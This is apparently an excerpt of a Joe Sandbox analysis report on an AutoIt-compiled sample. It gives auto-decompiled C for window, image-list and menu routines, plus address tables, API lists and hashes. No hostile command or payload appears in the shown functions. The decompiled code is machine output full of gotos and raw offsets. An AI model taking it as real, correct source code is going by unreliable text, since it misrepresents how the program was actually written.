							__eflags = (_t310[0x24] & 0x000000ff) - _t291;
							if((_t310[0x24] & 0x000000ff) != _t291) {
								_t315[0x64] = _v92;
								__eflags = _t291 - (_t310[0x24] & 0x000000ff);
								if(_t291 <= (_t310[0x24] & 0x000000ff)) {
									L48:
									_t310[0x24] = 0xff;
									E014487E3(_t315, _t291);
									_t315[0x63] = _t315[0x63] - 1;
									_t315[0x65] = _t315[0x65] & 0x00000000;
									goto L9;
								}
								L47:
								__eflags = _t291;
								goto L48;
							}
							__eflags = _t291 - _t315[0x63];
							if(_t291 == _t315[0x63]) {
								goto L47;
							} else {
								goto L48;
							}
						} else {
							goto L29;
						}
						do {
							L29:
							_t231 =  *0x1482944; // 0x19b5930
							_t292 =  *( *(_t231 + _t319 * 4));
							__eflags = _t292;
							if(_t292 == 0) {
								goto L42;
							}
							_t233 =  *(_t292 + 0x93);
							__eflags = _t233 - 0xff;
							if(_t233 == 0xff) {
								goto L42;
							}
							_t304 = _t310[0x24];
							__eflags = _t233 - _t304;
							if(__eflags != 0) {
								L35:
								if(__eflags > 0) {
									_t247 = _t233 - 1;
									__eflags = _t247;
									 *(_t292 + 0x93) = _t247;
								}
								_t234 =  *0x1482944; // 0x19b5930
								_t305 =  *((intOrPtr*)( *((intOrPtr*)(_t234 + _t319 * 4))));
								__eflags =  *((char*)(_t305 + 0x90)) - 0xb;
								if( *((char*)(_t305 + 0x90)) == 0xb) {
									_t293 = _t310[0x22] & 0x0000ffff;
									__eflags = _t293;
									if(_t293 >= 0) {
										_t236 =  *(_t305 + 0x88) & 0x0000ffff;
										__eflags = _t236;
										if(_t236 >= 0) {
											__eflags = _t236 - _t293;
											if(_t236 > _t293) {
												_t237 = _t236 - 1;
												__eflags = _t237;
												_v52 = 2;
												 *(_t305 + 0x88) = _t237;
												_t294 =  *0x1482944; // 0x19b5930
												_v32 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t294 + _t319 * 4)))) + 0x88));
												SendMessageW(_v96[0x62], 0x133d,  *( *((intOrPtr*)( *((intOrPtr*)(_t294 + _t319 * 4)))) + 0x93) & 0x000000ff,  &_v52);
											}
										}
									}
								}
								goto L42;
							}
							__eflags =  *((char*)(_t292 + 0x90)) - 0xb;
							if( *((char*)(_t292 + 0x90)) == 0xb) {
								__eflags = _t233 - _t304;
								goto L35;
							} else {
								E013B6799(_t319);
							}
							L42:
							_t319 = _t319 + 1;
							__eflags = _t319 -  *0x1482954; // 0x2
						} while (__eflags <= 0);
						goto L43;
					}
				}
				_t252 = _t172 - 0x13;
				if(_t252 == 0) {
					__eflags = _t310[0xe];
					_t320 = ImageList_Destroy;
					if(_t310[0xe] != 0) {
						ImageList_Destroy(_t310[0xe]);
					}
					__eflags = _t310[0xf];
					if(_t310[0xf] != 0) {
						 *_t320(_t310[0xf]);
					}
					_t321 = 3;
					__eflags =  *0x1482954 - _t321; // 0x2
					if(__eflags >= 0) {
						do {
							_t253 =  *0x1482944; // 0x19b5930
							_t306 =  *( *(_t253 + _t321 * 4));
							__eflags = _t306;
							if(_t306 != 0) {
								_t296 = _v96;
								__eflags =  *((intOrPtr*)(_t306 + 4)) - _t296[1];
								if( *((intOrPtr*)(_t306 + 4)) == _t296[1]) {
									__eflags =  *((char*)(_t306 + 0x90)) - 0x14;
									if( *((char*)(_t306 + 0x90)) == 0x14) {
										__eflags =  *((intOrPtr*)(_t306 + 0x34)) -  *_t310;
										if( *((intOrPtr*)(_t306 + 0x34)) ==  *_t310) {
											E013B6799(_t321);
										}
									}
								}
							}
							_t321 = _t321 + 1;
							__eflags = _t321 -  *0x1482954; // 0x2
						} while (__eflags <= 0);
					}
					goto L7;
				}
				_t260 = _t252 - 1;
				if(_t260 == 0) {
					_v68 = _t313;
					_v76 = 1;
					_t262 = SendMessageW(_t310[0xd], 0x1053, _v92,  &_v76);
					__eflags = _t262 - _v92;
					if(_t262 == _v92) {
						goto L17;
					}
					SendMessageW(_t310[0xd], 0x1008, _t262, 0);
					goto L8;
				}
				_t265 = _t260;
				if(_t265 == 0) {
					_t323 = 3;
					__eflags =  *0x1482954 - _t323; // 0x2
					if(__eflags < 0) {
						goto L7;
					} else {
						goto L106;
					}
					do {
						L106:
						_t266 =  *0x1482944; // 0x19b5930
						_t307 =  *( *(_t266 + _t323 * 4));
						__eflags = _t307;
						if(_t307 == 0) {
							goto L111;
						}
						__eflags =  *((intOrPtr*)(_t307 + 4)) -  *((intOrPtr*)(_t283 + 4));
						if( *((intOrPtr*)(_t307 + 4)) !=  *((intOrPtr*)(_t283 + 4))) {
							goto L111;
						}
						__eflags =  *((char*)(_t307 + 0x90)) - 3;
						if( *((char*)(_t307 + 0x90)) != 3) {
							goto L111;
						}
						__eflags = _t307->i - _t310[0xd];
						if(_t307->i != _t310[0xd]) {
							goto L111;
						}
						_t270 =  *0x1482944; // 0x19b5930
						MoveWindow( *( *( *(_t270 + _t323 * 4))), ( *( *(_t270 + _t323 * 4)))[0x22], ( *( *(_t270 + _t323 * 4)))[0x22],  *(_t298 + 0x8c),  *(_t298 + 0x8e), 0);
						goto L7;
						L111:
						_t323 = _t323 + 1;
						__eflags = _t323 -  *0x1482954; // 0x2
					} while (__eflags <= 0);
					goto L7;
				}
				_t277 = _t265 - 5;
				if(_t277 != 0) {
					__eflags = _t277 != 0;
					if(_t277 != 0) {
						goto L7;
					}
					E01447545(_t310, _t283);
					goto L8;
				} else {
					E013B670F(_t283, _t310);
					goto L7;
				}
			}

0x013b67a7
0x013b67b9
0x013b687d
0x013b687d
0x013b686c
0x013b6871
0x013b6871
0x013b67c3
0x013b67cc
0x013b67d4
0x013b67d6
0x013b67db
0x013b67e2
0x013b67e4
0x013b67e8
0x013b67ee
0x013b67f4
0x013f4fb9
0x013f540d
0x013b682e
0x013b682e
0x013b6832
0x013b6836
0x013f555c
0x013f555c
0x013b6840
0x013f556a
0x013f556a
0x013b684a
0x013f5578
0x013f5578
0x013b6854
0x013f5586
0x013f5586
0x013b685a
0x013b6861
0x013b6878
0x013b6878
0x013b6864
0x013b686b
0x00000000
0x013b686b
0x013f4fbf
0x013f4fc2
0x013f52a3
0x013f52a6
0x013b6826
0x013b6828
0x00000000
0x013b6828
0x013f52ac
0x013f52af
0x013f530e
0x013f5311
0x013f539a
0x013f53a0
0x013f53a6
0x013f53a8
0x013f53be
0x013f53aa
0x013f53ac
0x013f53b6
0x013f53b6
0x013f53c2
0x013f53c8
0x013f53ca
0x013f53cd
0x013f53d3
0x013f53d5
0x013f53da
0x013f53e6
0x013f53ec
0x013f53ec
0x013f53ec
0x013f53ec
0x013f53d5
0x013f53f5
0x00000000
0x013f53f5
0x013f531d
0x013f5328
0x013f5330
0x013f5343
0x013f5349
0x013f534b
0x00000000
0x00000000
0x013f534d
0x013f5351
0x013f5355
0x013f5357
0x00000000
0x00000000
0x013f5359
0x013f5361
0x013f5362
0x013f5364
0x013f5397
0x013f5397
0x00000000
0x00000000
0x00000000
0x00000000
0x013f5366
0x013f5366
0x013f5366
0x013f536e
0x013f5370
0x013f5372
0x013f5374
0x013f5377
0x013f5379
0x013f5380
0x013f5383
0x013f5388
0x013f538e
0x013f538e
0x013f5380
0x013f5377
0x013f5392
0x013f5393
0x013f5393
0x00000000
0x013f5366
0x013f52b1
0x013f52b4
0x00000000
0x00000000
0x013f52ba
0x013f52be
0x013f52c3
0x013f52c3
0x013f52c9
0x013f52d1
0x013f52d2
0x013f52d4
0x013f52da
0x013f52da
0x013f52e2
0x013f52e4
0x013f52e6
0x013f52eb
0x013f52ed
0x013f52ef
0x013f52f6
0x013f52f9
0x013f52fe
0x013f52fe
0x013f52f6
0x013f52ed
0x013f5304
0x013f5305
0x013f5305
0x013f5309
0x00000000
0x013f52d4
0x013f4fc8
0x013f522d
0x013f522e
0x013f5234
0x013f5273
0x013f5273
0x013f5279
0x013f527c
0x013f5298
0x00000000
0x013f5298
0x013f527f
0x013f5285
0x013f5289
0x00000000
0x00000000
0x00000000
0x00000000
0x013f5236
0x013f5236
0x013f5236
0x013f523e
0x013f5240
0x013f5242
0x00000000
0x00000000
0x013f5247
0x013f524a
0x00000000
0x00000000
0x013f524c
0x013f5252
0x013f5254
0x013f5260
0x013f5261
0x00000000
0x013f5261
0x013f5256
0x013f5258
0x00000000
0x00000000
0x013f525a
0x013f5266
0x013f5266
0x013f5267
0x013f5267
0x013f526f
0x00000000
0x013f526f
0x013f4fce
0x013f4fd1
0x00000000
0x00000000
0x013f4fd9
0x013f4fda
0x013f4fdc
0x013f5208
0x013f520e
0x013f5210
0x013f5216
0x013f5219
0x013f521f
0x013f521f
0x013f5219
0x00000000
0x013f5210
0x013f4fe2
0x013f4fe5
0x013f518a
0x013f518f
0x013f5191
0x013f51c4
0x013f51c4
0x013f51ca
0x013f51d0
0x013f51d6
0x013f51dc
0x013f51e2
0x013f51ea
0x013f51f0
0x013f51f4
0x013f51fd
0x013f51fd
0x00000000
0x013f51f4
0x013f5193
0x013f5195
0x013f5195
0x013f519d
0x013f519f
0x013f51a1
0x013f51a3
0x013f51aa
0x013f51b2
0x013f51b2
0x013f51aa
0x013f51b7
0x013f51b8
0x013f51b8
0x013f51bc
0x013f51c0
0x00000000
0x013f51c0
0x013f4feb
0x013f4fee
0x00000000
0x013f4ff4
0x013f4ffc
0x013f5013
0x013f5023
0x013f502a
0x013f5034
0x013f5037
0x013f5039
0x013f503b
0x013f5042
0x013f5047
0x013f504c
0x013f504c
0x013f5047
0x013f5052
0x013f5058
0x013f5137
0x013f513e
0x013f5142
0x013f5146
0x013f5148
0x013f5158
0x013f5165
0x013f5167
0x013f516a
0x013f516c
0x013f5173
0x013f5178
0x013f517e
0x00000000
0x013f517e
0x013f5169
0x013f5169
0x00000000
0x013f5169
0x013f514a
0x013f5150
0x00000000
0x013f5152
0x00000000
0x013f5152
0x00000000
0x00000000
0x00000000
0x013f505e
0x013f505e
0x013f505e
0x013f5066
0x013f5068
0x013f506a
0x00000000
0x00000000
0x013f5070
0x013f5076
0x013f5078
0x00000000
0x00000000
0x013f507e
0x013f5084
0x013f5086
0x013f50a3
0x013f50a3
0x013f50a5
0x013f50a5
0x013f50a7
0x013f50a7
0x013f50ad
0x013f50b5
0x013f50b7
0x013f50be
0x013f50c0
0x013f50c7
0x013f50ca
0x013f50cc
0x013f50d3
0x013f50d6
0x013f50d8
0x013f50db
0x013f50dd
0x013f50dd
0x013f50de
0x013f50e6
0x013f50ed
0x013f50ff
0x013f5124
0x013f5124
0x013f50db
0x013f50d6
0x013f50ca
0x00000000
0x013f50be
0x013f5088
0x013f508f
0x013f50a1
0x00000000
0x013f5091
0x013f5097
0x013f5097
0x013f512a
0x013f512a
0x013f512b
0x013f512b
0x00000000
0x013f505e
0x013f4fee
0x013b67fa
0x013b67fd
0x013f54eb
0x013f54ef
0x013f54f5
0x013f54fa
0x013f54fa
0x013f54fc
0x013f5500
0x013f5505
0x013f5505
0x013f5509
0x013f550a
0x013f5510
0x013f5516
0x013f5516
0x013f551e
0x013f5520
0x013f5522
0x013f5524
0x013f552b
0x013f552e
0x013f5530
0x013f5537
0x013f553c
0x013f553e
0x013f5546
0x013f5546
0x013f553e
0x013f5537
0x013f552e
0x013f554b
0x013f554c
0x013f554c
0x013f5554
0x00000000
0x013f5510
0x013b6803
0x013b6806
0x013f54ae
0x013f54bd
0x013f54cd
0x013f54cf
0x013f54d3
0x00000000
0x00000000
0x013f54e4
0x00000000
0x013f54e4
0x013b680d
0x013b6810
0x013f5430
0x013f5431
0x013f5437
0x00000000
0x00000000
0x00000000
0x00000000
0x013f543d
0x013f543d
0x013f543d
0x013f5445
0x013f5447
0x013f5449
0x00000000
0x00000000
0x013f544e
0x013f5451
0x00000000
0x00000000
0x013f5453
0x013f545a
0x00000000
0x00000000
0x013f545e
0x013f5461
0x00000000
0x00000000
0x013f5463
0x013f5491
0x00000000
0x013f549c
0x013f549c
0x013f549d
0x013f549d
0x00000000
0x013f54a5
0x013b6816
0x013b6819
0x013f5419
0x013f541c
0x00000000
0x00000000
0x013f5424
0x00000000
0x013b681f
0x013b6821
0x00000000
0x013b6821

APIs

DestroyWindow.USER32(?,?), ref: 013B6828
SendMessageW.USER32(?,00001308,?,00000000), ref: 013F5013
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 013F504C
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 013F5491

Part of subcall function 013B670F: InvalidateRect.USER32(?,00000000,00000001,?,?,?,013B16CD,?,00000000,?,?,?,?,013B169F,00000000,?), ref: 013B6772

SendMessageW.USER32(?,00001053), ref: 013F54CD
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 013F54E4
ImageList_Destroy.COMCTL32(00000000,?), ref: 013F54FA
ImageList_Destroy.COMCTL32(00000000,?), ref: 013F5505

Strings

0, xrefs: 013F531D

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 5c20e2b289983bac1d5d47b6dda4ebaf2736c2153bafd927e329f15df7d46af1
Instruction ID: 3f16f8d785108f7b0537f9e50703f4c26889420b939298b1f86d7971305abf0e
Opcode Fuzzy Hash: 5c20e2b289983bac1d5d47b6dda4ebaf2736c2153bafd927e329f15df7d46af1
Instruction Fuzzy Hash: 2612C0B4A04202EFDB25CF18C589BA9BFE5FB44318F04456DF649CBA62D771E842CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013B243E, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E013B243E(signed int __edx, void* __eflags, WCHAR* _a4, int _a8, signed int _a12, int _a16, int _a20, long _a24, signed int _a28, struct HWND__* _a32) {
				struct HWND__** _v8;
				long _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__** _t105;
				intOrPtr _t106;
				intOrPtr _t108;
				signed int _t111;
				signed int _t115;
				signed int _t117;
				int _t126;
				struct HWND__* _t135;
				intOrPtr _t136;
				int _t160;
				signed int _t164;
				int _t168;
				int _t172;
				struct HWND__** _t179;
				long _t182;
				signed int _t183;
				signed int _t200;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				void* _t211;
				signed int _t212;
				long _t213;
				void* _t215;
				long _t216;
				void* _t218;

				_t207 = __edx;
				_push(0x1d0);
				_t105 = E013B1457(E013D01FB(_t215, __eflags), __eflags);
				_t182 =  *0x1482934; // 0x0
				_t179 = _t105;
				_v8 = _t179;
				_v12 = _t182;
				_t218 =  *0x14828f0 - _t182; // 0x0
				if(_t218 != 0) {
					_t216 = 0;
					__eflags = _t182;
					if(_t182 <= 0) {
						goto L2;
					}
					_t207 =  *0x1482930; // 0x0
					while(1) {
						__eflags =  *( *(_t207 + _t216 * 4));
						if( *( *(_t207 + _t216 * 4)) == 0) {
							goto L2;
						}
						_t216 = _t216 + 1;
						__eflags = _t216 - _t182;
						if(_t216 < _t182) {
							continue;
						}
						goto L2;
					}
					goto L2;
				} else {
					_t216 = _t182;
					E013B1585(0x148292c, _t211,  &_v8);
					_t179 = _v8;
					_t182 = _t216;
					L2:
					_t106 =  *0x1482930; // 0x0
					_t212 = _a24;
					 *( *(_t106 + _t216 * 4)) = _t179;
					_t108 =  *0x1482930; // 0x0
					 *( *((intOrPtr*)( *((intOrPtr*)(_t108 + _t216 * 4)))) + 4) = _t216;
					if(_t212 == 0xffffffff) {
						_t212 = 0x80ca0000;
					}
					_t111 = _t212;
					_t213 = _t212 | 0x04000000;
					if((_t111 & 0x00010000) != 0) {
						_t213 = _t111 | 0x04080000;
					}
					if((_t213 & 0x00040000) != 0) {
						_t213 = _t213 | 0x00080000;
					}
					asm("sbb eax, eax");
					_t115 =  ~(_a28 + 1) & _a28;
					_a24 = _t115;
					if((_t115 & 0x00000040) != 0) {
						_t208 = _a32;
						__eflags = _t208;
						if(_t208 != 0) {
							_t183 = 0x40;
							_t179[3] = _t183;
							_a24 = _t115 ^ _t183;
							_t117 = E013B23E1(0x14828d0, _t208);
							__eflags = _t117;
							if(_t117 >= 0) {
								_t205 =  *0x1482930; // 0x0
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 + _t117 * 4)))) + 0xc)) = 0x80000000;
							}
							GetWindowRect(_a32,  &_v28);
							GetClientRect(_a32,  &_v44);
							_a8 = _a8 + _v28.right - _v44.right - GetSystemMetrics(7);
							_t207 = _a12 + _v28.bottom - _v44.bottom - GetSystemMetrics(8);
							_a28 = _t207;
							__eflags = (_t213 & 0x00c00000) - 0xc00000;
							if((_t213 & 0x00c00000) == 0xc00000) {
								_t172 = GetSystemMetrics(4);
								_t94 =  &_a28;
								 *_t94 = _a28 + _t172;
								__eflags =  *_t94;
							}
							_t126 = _a8;
							goto L8;
						}
						__eflags = _t216 - _t182;
						goto L38;
					} else {
						_a28 = _a12;
						_t126 = _a8;
						_a8 = _t126;
						L8:
						if(_a16 == 0xffffffff) {
							_a16 = 0x190;
						}
						if(_a20 == 0xffffffff) {
							_a20 = 0x190;
						}
						if(_t126 == 0xffffffff) {
							SystemParametersInfoW(0x30, 0,  &_v28, 0);
							_t168 = GetSystemMetrics(7);
							asm("cdq");
							_a8 = _v28.left - _a16 + _v28.right - _t168 - _t207 >> 1;
						}
						if(_a28 == 0xffffffff) {
							SystemParametersInfoW(0x30, 0,  &_v28, 0);
							_t160 = GetSystemMetrics(8);
							asm("cdq");
							_a28 = _v28.top - _a20 + _v28.bottom - _t160 - _t207 >> 1;
							if((_t213 & 0x00400000) != 0) {
								_t164 = GetSystemMetrics(4);
								asm("cdq");
								_t200 = 0xfffffffe;
								_a28 = _a28 + _t164 / _t200;
							}
						}
						SetRect( &_v28, 0, 0, _a16, _a20);
						AdjustWindowRectEx( &_v28, _t213, 0, _a24);
						_t135 = CreateWindowExW(_a24, L"AutoIt v3 GUI", _a4, _t213, _a8, _a28, _v28.right - _v28.left, _v28.bottom - _v28.top, _a32, 0,  *0x1482924, 0);
						 *_t179 = _t135;
						if(_t135 == 0) {
							__eflags = _t216 - _v12;
							L38:
							if(__eflags != 0) {
								_t136 =  *0x1482930; // 0x0
								 *( *(_t136 + _t216 * 4)) =  *( *(_t136 + _t216 * 4)) & 0x00000000;
							} else {
								E013B1835(0x148292c);
							}
							goto L42;
						} else {
							SetWindowLongW(_t135, 0xffffffeb, _t216);
							_t179[2] = _a32;
							_t179[0xf] = _a8;
							_t179[0x10] = _a28;
							GetClientRect( *_t179,  &_v28);
							_t179[0x11] = _v28.right - _v28.left;
							_t179[0x12] = _v28.bottom - _v28.top;
							SendMessageW( *_t179, 0x30, GetStockObject(0x11), 0);
							E013B1976(0x14828d0, _t179, 0xffffffff);
							if( *0x14828f4 == 0) {
								 *0x14828f4 = SetTimer(0, 0, 0x28, 0x13b1945);
							}
							 *0x14828f0 =  *0x14828f0 + 1;
							 *0x148293c = _t216;
							E013B2418(0x14828d0, 0);
							if((_t213 & 0x10000000) != 0) {
								__eflags = _a16;
								if(_a16 == 0) {
									L41:
									E01447E6A( *_t179);
									L42:
									return 0;
								}
								__eflags = _a20;
								if(_a20 == 0) {
									goto L41;
								}
								E013CFBD2(4, 0);
								goto L19;
							} else {
								L19:
								return  *_t179;
							}
						}
					}
				}
			}

0x013b243e
0x013b2447
0x013b2454
0x013b2459
0x013b245f
0x013b2461
0x013b2464
0x013b2467
0x013b246d
0x013f34b2
0x013f34b4
0x013f34b6
0x00000000
0x00000000
0x013f34bc
0x013f34c2
0x013f34c5
0x013f34c8
0x00000000
0x00000000
0x013f34ce
0x013f34cf
0x013f34d1
0x00000000
0x00000000
0x00000000
0x013f34d3
0x00000000
0x013b2473
0x013b2476
0x013b247e
0x013b2483
0x013b2486
0x013b2488
0x013b2488
0x013b248d
0x013b2493
0x013b2495
0x013b249f
0x013b24a5
0x013b24a7
0x013b24a7
0x013b24ac
0x013b24ae
0x013b24b9
0x013f34da
0x013f34da
0x013b24c5
0x013f34e5
0x013f34e5
0x013b24d1
0x013b24d3
0x013b24d6
0x013b24db
0x013f34f0
0x013f34f3
0x013f34f5
0x013f3500
0x013f3503
0x013f350c
0x013f350f
0x013f3514
0x013f3516
0x013f3518
0x013f3523
0x013f3523
0x013f3531
0x013f353e
0x013f3554
0x013f356a
0x013f3573
0x013f3578
0x013f357a
0x013f357e
0x013f3584
0x013f3584
0x013f3584
0x013f3584
0x013f3587
0x00000000
0x013f3587
0x013f34f7
0x00000000
0x013b24e1
0x013b24e4
0x013b24e7
0x013b24ea
0x013b24ed
0x013b24f6
0x013f358f
0x013f358f
0x013b2500
0x013f3597
0x013f3597
0x013b2509
0x013b2515
0x013b251d
0x013b2530
0x013b2535
0x013b2535
0x013b253c
0x013b2548
0x013b2550
0x013b2563
0x013b2568
0x013b2571
0x013b2575
0x013b257d
0x013b257e
0x013b2581
0x013b2581
0x013b2571
0x013b2592
0x013b25a2
0x013b25d5
0x013b25db
0x013b25df
0x013f359f
0x013f35a2
0x013f35a2
0x013f35b0
0x013f35b8
0x013f35a4
0x013f35a9
0x013f35a9
0x00000000
0x013b25e5
0x013b25e9
0x013b25f2
0x013b25f8
0x013b25fe
0x013b2607
0x013b2613
0x013b2620
0x013b262e
0x013b263c
0x013b2648
0x013b265b
0x013b265b
0x013b2660
0x013b266d
0x013b2673
0x013b267e
0x013f35cb
0x013f35cf
0x013f35bd
0x013f35bf
0x013f35c4
0x00000000
0x013f35c4
0x013f35d1
0x013f35d5
0x00000000
0x00000000
0x013f35db
0x00000000
0x013b2684
0x013b2684
0x00000000
0x013b2684
0x013b267e
0x013b25df
0x013b24db

APIs

SystemParametersInfoW.USER32 ref: 013B2515
GetSystemMetrics.USER32 ref: 013B251D
SystemParametersInfoW.USER32 ref: 013B2548
GetSystemMetrics.USER32 ref: 013B2550
GetSystemMetrics.USER32 ref: 013B2575
SetRect.USER32 ref: 013B2592
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 013B25A2
CreateWindowExW.USER32 ref: 013B25D5
SetWindowLongW.USER32 ref: 013B25E9
GetClientRect.USER32 ref: 013B2607
GetStockObject.GDI32(00000011), ref: 013B2623
SendMessageW.USER32(00000000,00000030,00000000), ref: 013B262E

Part of subcall function 013B1976: GetCursorPos.USER32(?,?,00000000,00000000,?,013B2641,00000000,000000FF,?,?,?), ref: 013B198A
Part of subcall function 013B1976: ScreenToClient.USER32 ref: 013B19A7
Part of subcall function 013B1976: GetAsyncKeyState.USER32(00000001), ref: 013B19CC
Part of subcall function 013B1976: GetAsyncKeyState.USER32(00000002), ref: 013B19E6

SetTimer.USER32(00000000,00000000,00000028,013B1945), ref: 013B2655

Strings

AutoIt v3 GUI, xrefs: 013B25CD

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 25383a13d722be057c3582fe7f413ebb433a9865b56ef55fc0c1eb9f3ad6b9f8
Instruction ID: 7ae1a803d585559820e84188af1f2f9fd8ee9be6f4b4c2180e8444d577bbf88f
Opcode Fuzzy Hash: 25383a13d722be057c3582fe7f413ebb433a9865b56ef55fc0c1eb9f3ad6b9f8
Instruction Fuzzy Hash: 80B14F75A0020ADFDB15DFA8D889FEE7BB5FB48318F014219FA19A7294DB74E841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013B3D10, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E013B3D10(struct HMENU__** __ecx, void* __fp0, struct HWND__* _a4, struct HMENU__*** _a16) {
				struct HMENU__* _v8;
				struct tagPOINT _v16;
				struct tagMENUITEMINFOW _v64;
				void* __edi;
				void* _t49;
				struct HMENU__* _t50;
				struct HMENU__* _t51;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				struct HMENU__* _t71;
				struct HMENU__*** _t72;
				struct HMENU__* _t74;
				struct HMENU__* _t78;
				struct HMENU__* _t79;
				signed int _t80;
				int _t83;
				struct HMENU__* _t85;
				struct HMENU__** _t92;
				signed int _t94;
				struct HMENU__** _t95;
				signed int _t96;
				signed int _t98;
				void* _t103;

				_t103 = __fp0;
				_v64.cbSize = 0x30;
				_t95 = __ecx;
				E013D2760(__ecx,  &(_v64.fMask), 0, 0x2c);
				_t4 =  &(_t95[0x274]); // 0x0
				_t85 =  *_t4;
				_t96 = 0;
				_v8 = _t85;
				_t80 = 8;
				_t94 = 1;
				_t49 = _a16 - 0x200;
				_t101 = _t49;
				if(_t49 != 0) {
					_t50 = _t49 - 1;
					__eflags = _t50;
					if(__eflags == 0) {
						_t96 = _t94;
						_push(0xfffffff9);
						goto L2;
					}
					_t70 = _t50 - 1;
					__eflags = _t70;
					if(__eflags == 0) {
						_t96 = 2;
						_push(0xfffffff8);
						goto L2;
					}
					_t71 = _t70 - 1;
					__eflags = _t71;
					if(_t71 == 0) {
						__eflags = _t95[2];
						_t96 = 4;
						if(__eflags == 0) {
							L25:
							_push(0xfffffff3);
							goto L2;
						}
						_v64.fState = _t80;
						_t83 = 7;
						_v64.fMask = _t94;
						__eflags = _t85 - _t83;
						if(__eflags < 0) {
							goto L25;
						}
						_t12 =  &(_t95[0x74]); // 0x1482b80
						_t72 = _t12;
						_a16 = _t72;
						do {
							_t92 =  *_t72;
							__eflags = _t92;
							if(_t92 == 0) {
								goto L22;
							}
							_t74 = GetMenuItemInfoW( *_t92, _t83, 0,  &_v64);
							__eflags = _t74;
							_t72 = _a16;
							if(_t74 == 0) {
								goto L22;
							}
							__eflags = _v64.fState & 0x00001000;
							if((_v64.fState & 0x00001000) == 0) {
								goto L22;
							}
							__eflags =  *( *_t72) -  *_t95;
							if(__eflags == 0) {
								E0141C47C(_t95, __eflags, _t83);
								goto L25;
							}
							_t72 = _a16;
							L22:
							_t83 = _t83 + 1;
							_t72 =  &(_t72[1]);
							_a16 = _t72;
							_t21 =  &(_t95[0x274]); // 0x0
							__eflags = _t83 -  *_t21;
						} while (__eflags <= 0);
						goto L25;
					}
					_t78 = _t71 - 1;
					__eflags = _t78;
					if(__eflags == 0) {
						_t96 = _t80;
						_push(0xfffffff7);
						goto L2;
					}
					_t79 = _t78 - 1;
					__eflags = _t79;
					if(__eflags == 0) {
						_t96 = 0x10;
						_push(0xfffffff6);
						goto L2;
					}
					_t51 = _t79 - 1;
					__eflags = _t51;
					if(__eflags != 0) {
						goto L3;
					}
					_t96 = 0x20;
					_push(0xfffffff2);
					goto L2;
				} else {
					_t96 = 0x40;
					_push(0xfffffff5);
					L2:
					_t51 = E013B3D6D(_t95, _t101);
					L3:
					if((_t95[3] & _t96) != 0) {
						__eflags =  *0x1482356;
						if( *0x1482356 == 0) {
							goto L4;
						}
						__eflags = _t95[1];
						if(_t95[1] == 0) {
							DeleteMenu( *_t95, 5, 0);
							DeleteMenu( *_t95, 4, 0);
							DeleteMenu( *_t95, 6, 0);
							DeleteMenu( *_t95, 3, 0);
							_t95[2] = 0;
						} else {
							__eflags = _t95[2];
							if(_t95[2] == 0) {
								_t64 = GetMenuItemCount( *_t95);
								_t98 = _t96 | 0xffffffff;
								__eflags = _t64;
								if(_t64 > 0) {
									_t95[0x274] = 4;
									E0141C4D0(_t95, 0, 0x144dbf4, _t98, _t98, 0);
								}
								_t25 =  &(_t95[0x1f]); // 0x19b59a8
								_t95[0x274] = 3;
								E0141C4D0(_t95, 0,  *_t25, _t98, _t98, 0);
								_t95[0x274] = 5;
								E0141C4D0(_t95, 0, 0x144dbf4, _t98, _t98, 0);
								_t28 =  &(_t95[0x1b]); // 0x19a1da0
								_t95[0x274] = 2;
								E0141C4D0(_t95, 0,  *_t28, _t98, _t98, 0);
								_t95[0x274] = _v8;
								_t95[2] = 1;
							}
						}
						_t51 = GetMenuItemCount( *_t95);
						__eflags = _t51;
						if(_t51 <= 0) {
							goto L4;
						} else {
							__eflags = _t95[1];
							if(_t95[1] != 0) {
								__eflags = _t95[1];
								if(_t95[1] != 0) {
									 *0x1482357 = 1;
									_v64.fMask = 1;
									_v64.fState = 8;
									SetMenuItemInfoW( *_t95, 4, 0,  &_v64);
								}
							} else {
								_t95[1] = 0;
							}
							GetCursorPos( &_v16);
							SetForegroundWindow(_a4);
							TrackPopupMenuEx( *_t95, 0, _v16, _v16.y, _a4, 0);
							PostMessageW(_a4, 0, 0, 0);
							return E013B4C04(_t95, _t103);
						}
					}
					L4:
					return _t51;
				}
			}

